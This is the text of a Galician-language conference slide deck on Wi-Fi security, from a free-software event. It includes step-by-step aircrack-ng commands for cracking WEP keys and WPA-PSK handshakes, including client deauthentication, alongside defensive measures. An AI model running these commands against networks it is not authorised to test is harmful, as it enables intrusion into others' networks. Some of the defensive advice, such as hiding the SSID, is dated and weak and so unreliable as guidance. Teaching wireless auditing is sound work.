5ª xornadas de software libre -...

5ª Xornadas de software libre

Raúl Piñeiro Martínez

5ª XORNADAS DE SOFTWARE LIBRE


Motivación

Introdución

Conceptos básicos das Wi-Fis

Elementos das Wi-Fis

Auditoría Wi-Fis

Seguridade Wi-Fis


Seguridade Wi-Fi e Software

libre

Problemática das Wi-fis

Wi-Fi e L.O.P.D.


Que é unha Wifi? É o que comunmente se coñece como

unha rede sen fíos.

As redes ser fíos ou Wifis permiten conectar un equipo a unha rede con fin de acceder aos diferentes recursos sen necesidade de fíos.

Nas redes sen fíos a transmisión da información realizase por ondas.


CaracterísticasMobilidade: as Wifis permiten a

posibilidade de estar conectado a unha rede e ter mobilidade.

Flexibilidade: chega a onde o cable non pode chegar, atravesa barreiras física (paredes, montañas, …) pode utilizase o aire libre ou espazos grandes.


Características

Económicas: o non ser un medio

guiado e utilizar ondas, o despliegue

da rede e de baixo custe. O número

de usuarios que se poden conectar e

moito mais grande que nas redes que

utilizan medios guiados.


Características

Rapidez: O non precisar de fíos para

a comunicación, o tempo de

instalación de unha rede redúcese o

feito de instalar un punto de acceso

ou de un repetidor fronte aos

elevados custes das redes con

medios guiados.


Características técnicas As redes Wi-Fi utilizan os estándares do

IEEE 802.11 que define o uso do nivel de capa físico e o nivel de enlace de datos da arquitectura OSI.

O estándar 802.11 foi publicado no ano 1997 polo IEEE, dous anos antes, no 1995 a aparece o Bluetooh de mans de Ericson, que convertería no estándar para as comunicacións entre móbiles.


Na actualidade o estándar IEEE 802.11

soporta múltiples protocolos, velocidades,

e utilizan diferentes bandas do espectro

electromagnético, os mas coñecidos son:

Protocolo Velocidade Banda

802.11 a 2 Mbps 5 Ghz

802.11 b 11 Mbps 2.4 Ghz

802.11 g 54 Mbps 2.4 Ghz

802.11G+ 108 Mbps 2.4 Ghz

802.11 n 600 Mbps 2.4 e 5 Ghz


Dentro de cada banda do espectro de

utilización defínense unha serie de canles

de emisión.

A utilización das canles varia segundo o

dominio regulador:Dominio Canles

América Do 01 ao 11

Europa Do 01 ao 13

Israel Do 03 ao 09

China Do 01 ao 11

Xapón Do 01 ao 14


SSID: é o nome da rede. Todo os paquetes que a rede manexa conteñen esa información.

WEP: sistema de cifrado non seguro con vulnerabilidades recoñecidas.

WPA: sistema de cifrado que corrixe os problemas de WEP.

WPA2: evolución do sistema de cifrado WPA.

Channel: Canle da banda que se utiliza para trasmitir o sinal.

MAC: direccíón física de unha tarxeta de rede que ven asignada polo fabricante e que é única no mundo.


ESSID: nome da rede

BSSID: direccíón MAC de un punto de

acceso

AES: esquema de cifrado de claves

TKIP: protocolo de cifrado de claves

Radius: protocolo de autenticación e

autorización


IVs: vector de iniciación é un bloque de bits que é preciso para cifrar un fluxo ou bloque de datos.

ARP: protocolo de resolución de direccións

Beacons: son tramas que emiten os dispositivos sen fíos para darse a coñecer no medio e que se poda establecer unha comunicación


Existen dous tipos de redes WI-FI en

función dos compoñentes que a

forman:

Redes AdHoc: son redes que se

establecen entre dous equipos finais (PCs,

móbiles, …). Neste tipo de redes non

existe ningún elemento de interconexión

entre os equipos.


Redes de infraestrutura: son redes que

teñen algún elemento de interconexión sen

fíos. Este tipo de redes en algún punto

teñen que estar conectada a unha rede

con fíos. O elemento mais común de

interconexión denominase AP (Access Point),

existen diferentes tipos de AP:

○ Router Wi-Fi

○ Access points

○ Equipos cliente


○ Router Wi-Fi: é un router convencional o que se lle engade un punto de acceso sen fíos e fai as dúas funcións.

○ Access Point: elemento de rede que centraliza as conexións de dispositivos terminais.

○ Equipos cliente: en equipos cliente temos diferentes elementos, desde PCs, impresoras, discos duros, videoconsolas, teléfonos móbiles, etc...


Para realizar unha auditoría Wi-Fi

precisamos os seguintes elementos:

Pc ou portátil

Cartón Wi-Fi que permita modo monitor

Software de auditoría Wi-Fi


Pc ou portátil

○ E recomendable un sistema GNU/Linux para

facer o proceso, ou ven unha distribución

LiveCD.

Cartón Wi-Fi que permita modo monitor

○ Precisamos un cartón Wi-Fi que permiten a

inxección de tramas o medio, e que o mesmo

tempo podamos observar o que acontece sen

estar autenticado nunha estación.

○ http://hwagm.elhacker.net/htm/tarjetas.htm

http://hwagm.elhacker.net/htm/tarjetas.htm


Software de auditoría Wi-Fi

○ Aircrack-ng

○ Distribución LiveCD Wifilax

○ Distribución LiveCD BackTrack

○ Distribución WHAX

○ Distribución WifiWay

○ Etc.


Auditoria WEP / WPA

○ Ferramenta Aircrack-ng

Aircrack-ng: busca o contrasinal da Wi-Fi

Airmon-ng: activa el modo monitor

Airodump-ng: captura os datos trasmitidos

e recorre os Ivs.


Aireplay-ng: realiza os ataques

- Ataque 0: Desautentificación

- Ataque 1: Autentificación falsa

- Ataque 2: Selección iterativa dun

paquete a enviar.

- Ataque 3: Reinxección de petición ARP

- Ataque 4: Predición de CRC


Auditoria WEP

Precisamos unha tarxeta que permita

inxección de tramas

Estar cerca de AP que cifrado WEP

http://www.aircrack-

ng.org/doku.php?id=es:simple_wep_crack

http://www.aircrack-ng.org/doku.php?id=es:simple_wep_crack




Auditoria WEP

1. Comprobamos que cartóns Wi-Fi temos

no sistema

# airmon-ng

2. Iniciamos o modo monitor co cartón

que permita a inxección de tramas

# airmon-ng start eth0


Auditoria WEP

3. Iniciamos o airodump-ng para a

busqueda de obxetivos

# airodump-ng eth0

4. Paramos o airodump-ng e en outro

terminar comezamos a lectura:

# airodump-ng -– ivs –w canal01 –c 1 eth0


Auditoria WEP

5. Co aireplay-ng autenticamos un cliente que teña conectado ou un cliente falso

# aireplay-ng -1 0 -e ESSID -a 00:11:22:33:44:55 -h 00:AA:BB:CC:DD:EE ath0

6. Co aireplay-ng inxectamos peticiónsARP

# aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:AA:BB:CC:DD:EE ath0


Auditoria WEP

7. Co aircrack-ng obtemos o contrasinais

# aircrack –x -0 canal01*.ivs


Auditoria WPA

Precisamos unha tarxeta que permita

inxección de tramas

Un dicionario de contrasinais

Estar cerca de AP que teña un cliente

conectado e con cifrado WPA e

autenticación PSK. http://www.aircrack-ng.org/doku.php?id=es:cracking_wpa

http://www.aircrack-ng.org/doku.php?id=es:cracking_wpa




Auditoria WPA

1. Comprobamos que cartóns Wi-Fi temos

no sistema

# airmon-ng

2. Iniciamos o modo monitor co cartón

que permita a inxección de tramas

# airmon-ng start eth0


Auditoria WPA

3. Iniciamos o airodump-ng para capturar o handshake.

# airodump-ng –c 1 --bssid 00:11:22:33:44:55 –w handshake eth0

4. Co aireplay-ng e o modo de desautenticar, lazamos un paquete de desautenticación a un cliente conectado:

# aireplay-ng -0 1 -a 00:11:22:33:44:55 -c 00:AA:BB:CC:DD:FF eth0


Auditoria WPA

5. Con el aircrack obtemos a clave

compartida

# aircrack-ng -w pass.lst –b

00:11:22:33:44:55 handshake*.cap


Medida básicas Planificar o alcance da instalación

○ Controlando o alcance da Wi-Fi podemos controlar o

radio de acción da mesma.

○ Os punto de acceso deben estar protexidos e non

estar o alcance de calquera.

○ Se temos que ampliar a capacidadade da antenas

sempre que sexa posible facelo nos clientes.


Medida básicas Cambiar os datos de acceso do router

○ Cambiar o contrasinal por defecto dos router ou APs

para evitar que intrusos accedan a configuración do

mesmo.

○ Establezca contrasinais seguros de acceso as

configuracións.


Medida básicas Ocultar e trocar o SSID da rede

○ Ocultando o SSID poremos trabas a usuarios alleos

a organización para que detecte a nosa rede, e so

se poderan conectas as persoas que coñezan o

nome exacto da rede.

○ Trocar o SSID de fábrica por un nome persoalizado,

de forma que non sexa una palabra trivial ou que se

poda deducir facilmente.


Medida básicas Utilizar protocolos e sistemas de encriptación de

seguridade.

○ Utilizar sempre WPA. NON usar WEP

○ Se non queda outra opción que utilizar WEP,

cambiar o contrasinal cada pouco tempo, e revisar

os logs do AP / Router para comprabar que non hai

accesos non autorizados.

○ Utilizar contrasinais seguros no WPA, que non sexa

palabras simples, debe conter como mínimo un

número e unha letra en mayusculas.


Medida básicas Apagar os routers / APs

○ Desconectar os routers e APs cando non se estean

a utilizar ou cando non se pensan utilizar durante

largos períodos de tempo

○ Posibilidade de utilizar temporizadores


Medida Avanzadas Utilizar filtrado por MAC

○ Coas listas de filtrado por MAC podemos indicarlle o

noso AP / Router que direccións MAC están

autorizadas a conectarse.

○ Temos que ter en conta que esta medida por si solo

non é efectiva, xa que calquer usuario mal

intencionado pode trocar a MAC e utilizar unha de

outro equipo que si teña permisos.


Medida Avanzadas Deshabilitar o DHCP no router

○ Utilizando IPs estáticas a seguridade da nosa WiFi

aumenta de sobremaneira.

○ O non estar activo o DHCP o usuario ten que probar

o chou cal pode ser a configuración IP.

○ Si utilizamos unha rede pouco usual

(172.19.31.XXX) e situamos a porta de enlace

nunha IP media de ese rango, as probabilidades de

dar con ela son moi baixas.


Medida Avanzadas Autenticación de usuarios

○ Utilizar sistemas de autenticación que permitan

identificar aos usuarios.

○ Implementar una solución de portal cautibo para

autenticar aos posibles usuarios.


Raúl Piñeiro Martínez

5ª xornadas de software libre -...

Documents